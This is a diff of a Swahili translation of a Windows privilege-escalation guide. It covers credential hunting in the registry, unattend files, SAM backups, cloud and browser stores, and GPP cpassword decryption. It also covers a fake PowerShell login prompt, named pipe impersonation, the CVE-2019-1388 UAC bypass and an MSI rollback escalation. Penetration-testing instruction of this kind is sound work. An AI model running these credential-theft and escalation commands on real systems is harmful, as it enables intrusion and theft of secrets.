@@ -905,40 +916,40 @@ $ErrorActionPreference = $OrigError ``` ### SCClient / SCCM -Angalia kama `C:\Windows\CCM\SCClient.exe` ipo.\ -Wakati wa kufunga **hufanywa kwa haki za SYSTEM**, nyingi zina udhaifu wa **DLL Sideloading (Taarifa kutoka** [**https://github.com/enjoiz/Privesc**](https://github.com/enjoiz/Privesc)**).** +Angalia kama `C:\Windows\CCM\SCClient.exe` ipo .\ +Wasakinishaji **huendeshwa kwa ruhusa za SYSTEM**, wengi wao wako hatarini kwa **DLL Sideloading (Taarifa kutoka** [**https://github.com/enjoiz/Privesc**](https://github.com/enjoiz/Privesc)**).** ```bash $result = Get-WmiObject -Namespace "root\ccm\clientSDK" -Class CCM_Application -Property * | select Name,SoftwareVersion if ($result) { $result } else { Write "Not Installed." } ``` -## Faili na Usajili (Akida) +## Mafaili na Registry (Credentials) -### Akida za Putty +### Putty Creds ```bash reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s | findstr "HKEY_CURRENT_USER HostName PortNumber UserName PublicKeyFile PortForwardings ConnectionSharing ProxyPassword ProxyUsername" #Check the values saved in each session, user/password could be there ``` -### Funguo za Mhost za Putty SSH +### Putty SSH Host Keys ``` reg query HKCU\Software\SimonTatham\PuTTY\SshHostKeys\ ``` -### SSH keys in registry +### SSH keys katika rejista -SSH private keys zinaweza kuhifadhiwa ndani ya funguo za registry `HKCU\Software\OpenSSH\Agent\Keys` hivyo unapaswa kuangalia kama kuna kitu chochote cha kuvutia huko: +Funguo binafsi za SSH zinaweza kuhifadhiwa ndani ya funguo la rejista `HKCU\Software\OpenSSH\Agent\Keys`, hivyo unapaswa kukagua kama kuna kitu chochote cha kuvutia hapo: ```bash reg query 'HKEY_CURRENT_USER\Software\OpenSSH\Agent\Keys' ``` -Ikiwa utapata ingizo lolote ndani ya njia hiyo, huenda ikawa ni funguo za SSH zilizohifadhiwa. 
Inahifadhiwa kwa njia ya usimbaji lakini inaweza kufichuliwa kwa urahisi kwa kutumia [https://github.com/ropnop/windows_sshagent_extract](https://github.com/ropnop/windows_sshagent_extract).\ +Ikiwa utapata kipengee chochote ndani ya njia hiyo, uwezekano mkubwa ni SSH key iliyohifadhiwa. Imehifadhiwa kwa usimbuaji lakini inaweza kufichuliwa kwa urahisi kwa kutumia [https://github.com/ropnop/windows_sshagent_extract](https://github.com/ropnop/windows_sshagent_extract).\ Taarifa zaidi kuhusu mbinu hii hapa: [https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent/](https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent/) -Ikiwa huduma ya `ssh-agent` haiko inayoendesha na unataka ianze kiotomatiki wakati wa kuanzisha, endesha: +Ikiwa `ssh-agent` service haifanyi kazi na unataka ianze moja kwa moja wakati wa boot endesha: ```bash Get-Service ssh-agent | Set-Service -StartupType Automatic -PassThru | Start-Service ``` > [!TIP] -> Inaonekana kwamba mbinu hii si halali tena. Nilijaribu kuunda funguo za ssh, kuziongeza na `ssh-add` na kuingia kupitia ssh kwenye mashine. Usajili HKCU\Software\OpenSSH\Agent\Keys haupo na procmon haikugundua matumizi ya `dpapi.dll` wakati wa uthibitishaji wa funguo zisizo sawa. +> Inaonekana mbinu hii haifanyi kazi tena. Nilijaribu kuunda baadhi ya ssh keys, kuziongeza kwa `ssh-add` na kuingia kwa ssh kwenye mashine. Registry HKCU\Software\OpenSSH\Agent\Keys haipo na procmon hakutambua matumizi ya `dpapi.dll` wakati wa uthibitisho wa funguo asimetriki. -### Faili zisizo na mtu +### Faili zilizoachwa bila uangalizi ``` C:\Windows\sysprep\sysprep.xml C:\Windows\sysprep\sysprep.inf 
@@ -953,7 +964,9 @@ C:\unattend.txt C:\unattend.inf dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul ``` -Unaweza pia kutafuta faili hizi ukitumia **metasploit**: _post/windows/gather/enum_unattend_ +Unaweza pia kutafuta faili hizi kwa kutumia **metasploit**: _post/windows/gather/enum_unattend_ + +Mfano wa yaliyomo: ```xml @@ -972,7 +985,7 @@ Unaweza pia kutafuta faili hizi ukitumia **metasploit**: _post/windows/gather/en ``` -### SAM & SYSTEM backups +### SAM & SYSTEM nakala za chelezo ```bash # Usually %SYSTEMROOT% = C:\Windows %SYSTEMROOT%\repair\SAM @@ -982,7 +995,7 @@ Unaweza pia kutafuta faili hizi ukitumia **metasploit**: _post/windows/gather/en %SYSTEMROOT%\System32\config\SYSTEM %SYSTEMROOT%\System32\config\RegBack\system ``` -### Hati za Wingu +### Vyeti vya Wingu ```bash #From user home .aws\credentials 
@@ -994,15 +1007,15 @@ AppData\Roaming\gcloud\access_tokens.db ``` ### McAfee SiteList.xml -Tafuta faili inayoitwa **SiteList.xml** +Tafuta faili iitwayo **SiteList.xml** -### Cached GPP Pasword +### Nywila ya GPP iliyohifadhiwa -Kipengele kilikuwa na uwezo wa awali ambacho kiliruhusu usambazaji wa akaunti za wasimamizi wa ndani za kawaida kwenye kundi la mashine kupitia Mipangilio ya Sera ya Kundi (GPP). Hata hivyo, njia hii ilikuwa na kasoro kubwa za usalama. Kwanza, Vitu vya Sera ya Kundi (GPOs), vilivyohifadhiwa kama faili za XML katika SYSVOL, vinaweza kufikiwa na mtumiaji yeyote wa kikoa. Pili, nywila ndani ya GPP hizi, zilizofichwa kwa AES256 kwa kutumia funguo za kawaida zilizoorodheshwa hadharani, zinaweza kufichuliwa na mtumiaji yeyote aliyeidhinishwa. Hii ilileta hatari kubwa, kwani inaweza kuruhusu watumiaji kupata haki za juu. +Kipengele kilikuwepo hapo awali kilichoruhusu usambazaji wa akaunti maalum za local administrator kwenye kundi la mashine kupitia Group Policy Preferences (GPP). Hata hivyo, njia hii ilikuwa na mapungufu makubwa ya usalama. Kwanza, Group Policy Objects (GPOs), zilizohifadhiwa kama faili za XML katika SYSVOL, zinaweza kupatikana na mtumiaji yeyote wa domain. Pili, password ndani ya GPP hizi, zilizofichwa kwa AES256 kwa kutumia default key iliyotangazwa hadharani, zinaweza kufifuliwa na mtumiaji yeyote aliyethibitishwa. Hii ilisababisha hatari kubwa, kwani inaweza kumruhusu mtumiaji kupata privileges za juu. -Ili kupunguza hatari hii, kazi ilitengenezwa kutafuta faili za GPP zilizohifadhiwa kwa ndani zenye uwanja wa "cpassword" ambao si tupu. Punde tu inapo pata faili kama hiyo, kazi hiyo inafichua nywila na inarudisha kitu maalum cha PowerShell. Kitu hiki kinajumuisha maelezo kuhusu GPP na mahali ambapo faili hiyo iko, kusaidia katika kutambua na kurekebisha udhaifu huu wa usalama. 
+Ili kupunguza hatari hii, ilitengenezwa function ambayo inachambua faili za GPP zilizohifadhiwa lokal zinazojumuisha field ya "cpassword" ambayo si tupu. Ikikuta faili kama hiyo, function inadecrypt password na kurudisha custom PowerShell object. Object hii inajumuisha maelezo kuhusu GPP na eneo la faili, ikisaidia katika utambuzi na kurekebisha udhaifu huu wa usalama. -Tafuta katika `C:\ProgramData\Microsoft\Group Policy\history` au katika _**C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\history** (kabla ya W Vista)_ kwa ajili ya faili hizi: +Tafuta katika `C:\ProgramData\Microsoft\Group Policy\history` au katika _**C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\history** (previous to W Vista)_ kwa faili hizi: - Groups.xml - Services.xml @@ -1011,12 +1024,12 @@ Tafuta katika `C:\ProgramData\Microsoft\Group Policy\history` au katika _**C:\Do - Printers.xml - Drives.xml -**Ili kufichua cPassword:** +**Ili ku-decrypt cPassword:** ```bash #To decrypt these passwords you can decrypt it using gpp-decrypt j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw ``` -Kutumia crackmapexec kupata nywila: +Kutumia crackmapexec kupata passwords: ```bash crackmapexec smb 10.10.10.10 -u username -p pwd -M gpp_autologin ``` @@ -1034,7 +1047,7 @@ C:\inetpub\wwwroot\web.config Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue Get-Childitem –Path C:\xampp\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue ``` -Mfano wa web.config wenye akidi: +Mfano wa web.config yenye credentials: ```xml @@ -1044,7 +1057,7 @@ Mfano wa web.config wenye akidi: ``` -### Akiba za OpenVPN +### OpenVPN nyaraka za kuingia ```csharp Add-Type -AssemblyName System.Security $keys = Get-ChildItem "HKCU:\Software\OpenVPN-GUI\configs" 
@@ -1064,7 +1077,7 @@ $entropy, Write-Host ([System.Text.Encoding]::Unicode.GetString($decryptedbytes)) } ``` -### Magogo +### Magazeti ```bash # IIS C:\inetpub\logs\LogFiles\* @@ -1072,9 +1085,9 @@ C:\inetpub\logs\LogFiles\* #Apache Get-Childitem –Path C:\ -Include access.log,error.log -File -Recurse -ErrorAction SilentlyContinue ``` -### Uliza kwa ajili ya akidi +### Omba credentials -Unaweza kila wakati **kumwomba mtumiaji aingize akidi zake au hata akidi za mtumiaji mwingine** ikiwa unafikiri anaweza kujua hizo (zingatia kwamba **kuuliza** mteja moja kwa moja kwa ajili ya **akidi** ni hatari sana): +Unaweza kila wakati **kumwomba mtumiaji aingize credentials zake au hata credentials za mtumiaji mwingine** ikiwa unadhani anaweza kuyajua (kumbuka kwamba **kuuliza** mteja moja kwa moja kwa **credentials** ni kweli **hatari**): ```bash $cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+[Environment]::UserName,[Environment]::UserDomainName); $cred.getnetworkcredential().password $cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+'anotherusername',[Environment]::UserDomainName); $cred.getnetworkcredential().password @@ -1082,9 +1095,9 @@ $cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::U #Get plaintext $cred.GetNetworkCredential() | fl ``` -### **Majina ya faili yanayoweza kuwa na akidi** +### **Majina ya faili yanayoweza kuwa na credentials** -Faili zinazojulikana ambazo zamani zilikuwa na **nywila** katika **maandishi wazi** au **Base64** +Faili zilizojulikana ambazo zamani zilikuwa na **passwords** kwa **clear-text** au **Base64** ```bash $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history vnc.ini, ultravnc.ini, *vnc* 
@@ -1159,80 +1172,80 @@ Get-Childitem –Path C:\ -Include *unattend*,*sysprep* -File -Recurse -ErrorAct ``` ### Credentials in the RecycleBin -Unapaswa pia kuangalia Bin kutafuta akiba ndani yake +Pia unapaswa kuangalia Bin kutafuta vielelezo vya kuingia ndani yake -Ili **kurejesha nywila** zilizohifadhiwa na programu kadhaa unaweza kutumia: [http://www.nirsoft.net/password_recovery_tools.html](http://www.nirsoft.net/password_recovery_tools.html) +To **kupata tena nywila** zilizohifadhiwa na programu kadhaa unaweza kutumia: [http://www.nirsoft.net/password_recovery_tools.html](http://www.nirsoft.net/password_recovery_tools.html) -### Inside the registry +### Ndani ya rejista -**Funguo zingine zinazowezekana za registry zenye akiba** +**Vifunguo vingine vya rejista vinavyoweza kuwa na vielelezo vya kuingia** ```bash reg query "HKCU\Software\ORL\WinVNC3\Password" reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" /s reg query "HKCU\Software\TightVNC\Server" reg query "HKCU\Software\OpenSSH\Agent\Key" ``` -[**Toa funguo za openssh kutoka kwa rejista.**](https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent/) +[**Extract openssh keys from registry.**](https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent/) -### Historia ya Vivinjari +### Historia ya vivinjari -Unapaswa kuangalia kwa dbs ambapo nywila kutoka **Chrome au Firefox** zimehifadhiwa.\ -Pia angalia historia, alama na vipendwa vya vivinjari ili labda baadhi ya **nywila zimehifadhiwa** huko. +Unapaswa kuangalia dbs ambapo nywila za **Chrome au Firefox** zinahifadhiwa.\ +Pia angalia historia, bookmarks na favourites za vivinjari, kwani huenda baadhi ya **nywila zimehifadhiwa** huko. 
-Zana za kutoa nywila kutoka kwa vivinjari: +Tools to extract passwords from browsers: - Mimikatz: `dpapi::chrome` - [**SharpWeb**](https://github.com/djhohnstein/SharpWeb) - [**SharpChromium**](https://github.com/djhohnstein/SharpChromium) - [**SharpDPAPI**](https://github.com/GhostPack/SharpDPAPI) -### **Kuandika Upya COM DLL** +### **COM DLL Overwriting** -**Component Object Model (COM)** ni teknolojia iliyojengwa ndani ya mfumo wa uendeshaji wa Windows inayoruhusu **mawasiliano** kati ya vipengele vya programu za lugha tofauti. Kila kipengele cha COM kinatambuliwa kupitia kitambulisho cha darasa (CLSID) na kila kipengele kinatoa kazi kupitia moja au zaidi ya interfaces, zinazotambuliwa kupitia kitambulisho cha interface (IIDs). +Component Object Model (COM) ni teknolojia iliyojengwa ndani ya mfumo wa uendeshaji wa Windows inayoruhusu mawasiliano kati ya vipengele vya programu vilivyoandikwa kwa lugha tofauti. Kila sehemu ya COM inatambulishwa kwa class ID (CLSID) na kila sehemu huonyesha utendakazi kupitia interface moja au zaidi, zinazotambulishwa kwa interface IDs (IIDs). -Darasa na interfaces za COM zinafafanuliwa katika rejista chini ya **HKEY\CLASSES\ROOT\CLSID** na **HKEY\CLASSES\ROOT\Interface** mtawalia. Rejista hii inaundwa kwa kuunganisha **HKEY\LOCAL\MACHINE\Software\Classes** + **HKEY\CURRENT\USER\Software\Classes** = **HKEY\CLASSES\ROOT.** +COM classes and interfaces are defined in the registry under **HKEY\CLASSES\ROOT\CLSID** and **HKEY\CLASSES\ROOT\Interface** respectively. This registry is created by merging the **HKEY\LOCAL\MACHINE\Software\Classes** + **HKEY\CURRENT\USER\Software\Classes** = **HKEY\CLASSES\ROOT.** -Ndani ya CLSIDs za rejista hii unaweza kupata rejista ya mtoto **InProcServer32** ambayo ina **thamani ya kawaida** inayoelekeza kwenye **DLL** na thamani inayoitwa **ThreadingModel** ambayo inaweza kuwa **Apartment** (Single-Threaded), **Free** (Multi-Threaded), **Both** (Single au Multi) au **Neutral** (Thread Neutral). 
+Inside the CLSIDs of this registry you can find the child registry **InProcServer32** which contains a **default value** pointing to a **DLL** and a value called **ThreadingModel** that can be **Apartment** (Single-Threaded), **Free** (Multi-Threaded), **Both** (Single or Multi) or **Neutral** (Thread Neutral). ![](<../../images/image (729).png>) -Kimsingi, ikiwa unaweza **kuandika upya yoyote ya DLLs** ambazo zitatekelezwa, unaweza **kuinua mamlaka** ikiwa hiyo DLL itatekelezwa na mtumiaji tofauti. +Kwa kifupi, ikiwa unaweza kuandika juu (overwrite) DLL yoyote itakayotekelezwa, unaweza escalate privileges ikiwa DLL hiyo itatekelezwa na mtumiaji mwingine. -Ili kujifunza jinsi washambuliaji wanavyotumia COM Hijacking kama njia ya kudumu angalia: +Ili kujifunza jinsi wadukuzi wanavyotumia COM Hijacking kama mekanisimu ya persistence angalia: {{#ref}} com-hijacking.md {{#endref}} -### **Utafutaji wa Nywila za Kijenerali katika Faili na Rejista** +### **Utafutaji wa nywila kwa ujumla katika faili na registry** -**Tafuta maudhui ya faili** +**Tafuta yaliyomo katika faili** ```bash cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt findstr /si password *.xml *.ini *.txt *.config findstr /spin "password" *.* ``` -**Tafuta faili yenye jina fulani** +**Tafuta faili lenye jina fulani** ```bash dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config* where /R C:\ user.txt where /R C:\ *.ini ``` -**Tafuta kwenye rejista kwa majina ya funguo na nywila** +**Tafuta registry kwa key names na passwords** ```bash REG QUERY HKLM /F "password" /t REG_SZ /S /K REG QUERY HKCU /F "password" /t REG_SZ /S /K REG QUERY HKLM /F "password" /t REG_SZ /S /d REG QUERY HKCU /F "password" /t REG_SZ /S /d ``` -### Zana za kutafuta nywila +### Zana zinazotafuta passwords -[**MSF-Credentials Plugin**](https://github.com/carlospolop/MSF-Credentials) **ni plugin ya msf** niliyoitengeneza plugin hii ili **kutekeleza kiotomati kila moduli ya POST ya metasploit inayotafuta 
nywila** ndani ya mwathirika.\ -[**Winpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) inatafuta kiotomati faili zote zinazokuwa na nywila zilizotajwa katika ukurasa huu.\ -[**Lazagne**](https://github.com/AlessandroZ/LaZagne) ni zana nyingine nzuri ya kutoa nywila kutoka kwa mfumo. +[**MSF-Credentials Plugin**](https://github.com/carlospolop/MSF-Credentials) **ni plugin ya msf** niliyetengeneza; plugin hii **inatekeleza kwa otomatiki kila metasploit POST module inayotafuta credentials** ndani ya mwathiriwa.\ +[**Winpeas**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite) inatafuta moja kwa moja faili zote zenye passwords zilizotajwa katika ukurasa huu.\ +[**Lazagne**](https://github.com/AlessandroZ/LaZagne) ni zana nyingine nzuri ya kutoa password kutoka kwa mfumo. -Zana [**SessionGopher**](https://github.com/Arvanaghi/SessionGopher) inatafuta **sessions**, **majina ya watumiaji** na **nywila** za zana kadhaa zinazohifadhi data hii kwa maandiko wazi (PuTTY, WinSCP, FileZilla, SuperPuTTY, na RDP) +Zana [**SessionGopher**](https://github.com/Arvanaghi/SessionGopher) inatafuta **sessions**, **usernames** na **passwords** za zana kadhaa zinazohifadhi data hii kwa maandishi wazi (PuTTY, WinSCP, FileZilla, SuperPuTTY, na RDP) ```bash Import-Module path\to\SessionGopher.ps1; Invoke-SessionGopher -Thorough 
@@ -1241,30 +1254,30 @@ Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss ``` ## Leaked Handlers -Fikiria kwamba **mchakato unaotembea kama SYSTEM unafungua mchakato mpya** (`OpenProcess()`) kwa **ufikiaji kamili**. Mchakato huo huo **pia unaunda mchakato mpya** (`CreateProcess()`) **kwa ruhusa za chini lakini ukirithi handles zote za wazi za mchakato mkuu**.\ -Kisha, ikiwa una **ufikiaji kamili kwa mchakato wa chini wa ruhusa**, unaweza kuchukua **handle wazi kwa mchakato wa ruhusa ulioanzishwa** na `OpenProcess()` na **kuingiza shellcode**.\ +Fikiria kuwa **mchakato unaoendesha kama SYSTEM unafungua mchakato mpya** (`OpenProcess()`) kwa **upatikanaji kamili**. Mchakato huo huo **pia hutengeneza mchakato mpya** (`CreateProcess()`) **enye ruhusa za chini lakini inayoirithi handles zote zilizofunguliwa za mchakato mkuu**.\ +Kisha, ikiwa una **upatikanaji kamili kwa mchakato wa ruhusa ndogo**, unaweza kuchukua **open handle ya mchakato mwenye ruhusa iliyoanzishwa** kwa `OpenProcess()` na **kuingiza shellcode**.\ [Read this example for more information about **how to detect and exploit this vulnerability**.](leaked-handle-exploitation.md)\ [Read this **other post for a more complete explanation on how to test and abuse more open handlers of processes and threads inherited with different levels of permissions (not only full access)**](http://dronesec.pw/blog/2019/08/22/exploiting-leaked-process-and-thread-handles/). ## Named Pipe Client Impersonation -Sehemu za kumbukumbu zilizoshirikiwa, zinazoitwa **pipes**, zinawezesha mawasiliano ya mchakato na uhamasishaji wa data. +Sehemu za kumbukumbu zilizoshirikiwa, zinazojulikana kama **pipes**, zinawezesha mawasiliano ya michakato na uhamishaji wa data. -Windows inatoa kipengele kinachoitwa **Named Pipes**, kinachoruhusu michakato isiyo na uhusiano kushiriki data, hata kupitia mitandao tofauti. 
Hii inafanana na usanifu wa mteja/server, ambapo majukumu yanafafanuliwa kama **named pipe server** na **named pipe client**. +Windows inatoa kipengele kinachoitwa **Named Pipes**, kinachomruhusu michakato isiyohusiana kushiriki data, hata juu ya mitandao tofauti. Hii inafanana na usanifu wa client/server, ambapo majukumu yanatafsiriwa kama **named pipe server** na **named pipe client**. -Wakati data inatumwa kupitia pipe na **mteja**, **server** iliyoweka pipe ina uwezo wa **kuchukua utambulisho** wa **mteja**, ikiwa ina haki zinazohitajika za **SeImpersonate**. Kutambua **mchakato wa ruhusa** unaowasiliana kupitia pipe unayoweza kuiga kunatoa fursa ya **kupata ruhusa za juu** kwa kukubali utambulisho wa mchakato huo mara tu unapoingiliana na pipe uliyounda. Kwa maelekezo ya kutekeleza shambulio kama hilo, mwongozo wa kusaidia unaweza kupatikana [**here**](named-pipe-client-impersonation.md) na [**here**](#from-high-integrity-to-system). +Wakati data inapotumwa kupitia pipe na **client**, **server** aliyeweka pipe ana uwezo wa **kuiga utambulisho** wa **client**, iwapo ana haki zinazohitajika za **SeImpersonate**. Kuibua mchakato wenye ruhusa unaowasiliana kupitia pipe unaweza kuiga kunatoa fursa ya **kupata ruhusa za juu** kwa kuchukua utambulisho wa mchakato huo mara tu unaposhirikiana na pipe uliyoiweka. Kwa maagizo ya jinsi ya kutekeleza shambulio kama hilo, mwongozo muhimu unaweza kupatikana [**hapa**](named-pipe-client-impersonation.md) na [**hapa**](#from-high-integrity-to-system). 
-Pia zana ifuatayo inaruhusu **kukamata mawasiliano ya named pipe kwa zana kama burp:** [**https://github.com/gabriel-sztejnworcel/pipe-intercept**](https://github.com/gabriel-sztejnworcel/pipe-intercept) **na zana hii inaruhusu kuorodhesha na kuona pipes zote ili kupata privescs** [**https://github.com/cyberark/PipeViewer**](https://github.com/cyberark/PipeViewer) +Vilevile zana ifuatayo inaruhusu **kuingilia mawasiliano ya named pipe kwa zana kama burp:** [**https://github.com/gabriel-sztejnworcel/pipe-intercept**](https://github.com/gabriel-sztejnworcel/pipe-intercept) **na zana hii inaruhusu kuorodhesha na kuona pipes zote ili kupata privescs** [**https://github.com/cyberark/PipeViewer**](https://github.com/cyberark/PipeViewer) -## Misc +## Mengine -### File Extensions that could execute stuff in Windows +### Extensions za faili zinazoweza kutekeleza vitu katika Windows -Check out the page **[https://filesec.io/](https://filesec.io/)** +Angalia ukurasa **[https://filesec.io/](https://filesec.io/)** -### **Monitoring Command Lines for passwords** +### **Kufuatilia Mistari ya Amri kwa nywila** -Wakati unapata shell kama mtumiaji, kunaweza kuwa na kazi zilizopangwa au michakato mingine inayotekelezwa ambayo **inasafirisha akidi kwenye mstari wa amri**. Skripti iliyo hapa chini inakamata mistari ya amri za mchakato kila sekunde mbili na kulinganisha hali ya sasa na hali ya awali, ikitoa tofauti zozote. +Unapopata shell kama mtumiaji, kunaweza kuwa na scheduled tasks au michakato mingine inayotekelezwa ambayo **huweka nywila kwenye command line**. Script chini inakamata command lines za michakato kila sekunde mbili na inalinganisha hali ya sasa na ile ya awali, ikitoa tofauti zozote. ```bash while($true) { 
@@ -1276,13 +1289,13 @@ Compare-Object -ReferenceObject $process -DifferenceObject $process2 ``` ## Kuiba nywila kutoka kwa michakato -## Kutoka kwa Mtumiaji wa Haki za Chini hadi NT\AUTHORITY SYSTEM (CVE-2019-1388) / UAC Bypass +## Kutoka kwa mtumiaji mwenye vibali vya chini hadi NT\AUTHORITY SYSTEM (CVE-2019-1388) / UAC Bypass -Ikiwa una ufikiaji wa kiolesura cha grafiki (kupitia console au RDP) na UAC imewezeshwa, katika toleo zingine za Microsoft Windows inawezekana kuendesha terminal au mchakato mwingine wowote kama "NT\AUTHORITY SYSTEM" kutoka kwa mtumiaji asiye na haki. +Ikiwa una ufikiaji wa kiolesura cha picha (via console au RDP) na UAC imewezeshwa, katika baadhi ya matoleo ya Microsoft Windows inawezekana kuendesha terminal au mchakato mwingine wowote kama "NT\AUTHORITY SYSTEM" kutoka kwa mtumiaji asiye na vibali. -Hii inafanya iwezekane kupandisha haki na kupita UAC kwa wakati mmoja kwa kutumia udhaifu huo huo. Zaidi ya hayo, hakuna haja ya kufunga chochote na binary inayotumika wakati wa mchakato, imesainiwa na kutolewa na Microsoft. +Hii inafanya iwezekane kuongeza kiwango cha vibali na kupitisha UAC kwa wakati mmoja kwa udhaifu huo uleule. Zaidi ya hayo, hakuna haja ya kusakinisha chochote na binary inayotumika wakati wa mchakato huo imesainiwa na kutolewa na Microsoft. -Baadhi ya mifumo iliyoathiriwa ni ifuatayo: +Baadhi ya mifumo iliyoathirika ni zifuatazo: ``` SERVER ====== @@ -1304,7 +1317,7 @@ Windows 10 1607 14393 ** link OPENED AS SYSTEM ** Windows 10 1703 15063 link NOT opened Windows 10 1709 16299 link NOT opened ``` -Ili kutumia udhaifu huu, ni lazima ufanye hatua zifuatazo: +Ili ku-exploit udhaifu huu, ni lazima ufanye hatua zifuatazo: ``` 1) Right click on the HHUPD.EXE file and run it as Administrator. 
@@ -1326,9 +1339,9 @@ You have all the necessary files and information in the following GitHub reposit https://github.com/jas502n/CVE-2019-1388 -## Kutoka kwa Administrator Medium hadi High Integrity Level / UAC Bypass +## Kutoka Administrator Medium hadi High Integrity Level / UAC Bypass -Soma hii ili **ujifunze kuhusu Viwango vya Uaminifu**: +Soma hii ili **ujifunze kuhusu Viwango vya Uadilifu**: {{#ref}} 
@@ -1342,128 +1355,128 @@ Kisha **soma hii ili ujifunze kuhusu UAC na UAC bypasses:** ../authentication-credentials-uac-and-efs/uac-user-account-control.md {{#endref}} -## Kutoka kwa Kuondoa/Kuhamasisha/Kubadilisha Folda ya Kichaguliwa hadi SYSTEM EoP +## Kutoka Arbitrary Folder Delete/Move/Rename hadi SYSTEM EoP -Tekniki iliyoelezwa [**katika chapisho hili la blog**](https://www.zerodayinitiative.com/blog/2022/3/16/abusing-arbitrary-file-deletes-to-escalate-privilege-and-other-great-tricks) na msimbo wa exploit [**upatikane hapa**](https://github.com/thezdi/PoC/tree/main/FilesystemEoPs). +Mbinu iliyoelezewa [**in this blog post**](https://www.zerodayinitiative.com/blog/2022/3/16/abusing-arbitrary-file-deletes-to-escalate-privilege-and-other-great-tricks) pamoja na code ya exploit [**available here**](https://github.com/thezdi/PoC/tree/main/FilesystemEoPs). -Shambulio hili kimsingi linajumuisha kutumia kipengele cha kurejesha cha Windows Installer ili kubadilisha faili halali na za uhalifu wakati wa mchakato wa kuondoa. Kwa hili, mshambuliaji anahitaji kuunda **msanidi wa MSI mbaya** ambayo itatumika kuingilia folda ya `C:\Config.Msi`, ambayo baadaye itatumika na Windows Installer kuhifadhi faili za kurejesha wakati wa kuondoa pakiti nyingine za MSI ambapo faili za kurejesha zingekuwa zimebadilishwa ili kuwa na mzigo mbaya. +Shambulio kwa ujumla linahusu kutumia vibaya kipengele cha rollback cha Windows Installer ili kubadilisha faili halali kuwa zile zenye madhara wakati wa prosesu ya uninstallation. Kwa hili mshambuliaji anahitaji kuunda **malicious MSI installer** ambayo itatumika ku-hijack folda ya `C:\Config.Msi`, ambayo baadaye Windows Installer itaitumia kuhifadhi faili za rollback wakati wa uninstallation ya vifurushi vingine vya MSI ambapo faili za rollback zingeweza kubadilishwa kubeba payload yenye madhara. -Tekniki iliyofupishwa ni ifuatayo: +Mbinu iliyofupishwa ni ifuatayo: -1. 
**Hatua ya 1 – Kujiandaa kwa Uingiliaji (acha `C:\Config.Msi` kuwa tupu)** +1. **Stage 1 – Kujiandaa kwa Hijack (acha `C:\Config.Msi` iwe tupu)** -- Hatua ya 1: Sakinisha MSI -- Unda `.msi` inayosakinisha faili isiyo na madhara (mfano, `dummy.txt`) katika folda inayoweza kuandikwa (`TARGETDIR`). -- Weka msanidi kama **"UAC Inayokubalika"**, ili **mtumiaji asiye admin** aweze kuikimbia. -- Hifadhi **handle** wazi kwa faili baada ya kusakinisha. +- Step 1: Install the MSI +- Tengeneza `.msi` ambayo inaweka faili isiyo na madhara (mfano, `dummy.txt`) katika folda inayoweza kuandikwa (`TARGETDIR`). +- Tambua installer kama **"UAC Compliant"**, ili **mtumiaji asiye admin** aweze kuendesha. +- Weka **handle** wazi kwa faili baada ya install. -- Hatua ya 2: Anza Kuondoa -- Ondoa ile ile `.msi`. -- Mchakato wa kuondoa unaanza kuhamasisha faili kwenda `C:\Config.Msi` na kuzipatia majina ya faili ya `.rbf` (backup za kurejesha). -- **Poll handle ya faili wazi** kwa kutumia `GetFinalPathNameByHandle` ili kugundua wakati faili inakuwa `C:\Config.Msi\.rbf`. +- Step 2: Begin Uninstall +- Uninstall `.msi` ile ile. +- Mchakato wa uninstall huanza kuhamisha faili kwenda `C:\Config.Msi` na kuyabadilisha jina kuwa faili `.rbf` (backup za rollback). +- **Kaga handle ya faili uliyo wazi** kwa kutumia `GetFinalPathNameByHandle` ili kugundua wakati faili inakuwa `C:\Config.Msi\.rbf`. -- Hatua ya 3: Usawazishaji wa Kawaida -- `.msi` inajumuisha **kitendo cha kuondoa cha kawaida (`SyncOnRbfWritten`)** ambacho: -- Kinatoa ishara wakati `.rbf` imeandikwa. -- Kisha **inasubiri** kwenye tukio lingine kabla ya kuendelea na kuondoa. +- Step 3: Custom Syncing +- `.msi` inajumuisha **custom uninstall action (`SyncOnRbfWritten`)** ambayo: +- Inaonyesha (signals) wakati `.rbf` imeandikwa. +- Kisha **inasubiri** tukio lingine kabla ya kuendelea na uninstall. -- Hatua ya 4: Zuia Kuondoa `.rbf` -- Wakati inatoa ishara, **fungua faili ya `.rbf`** bila `FILE_SHARE_DELETE` — hii **inazuia kuondolewa**. 
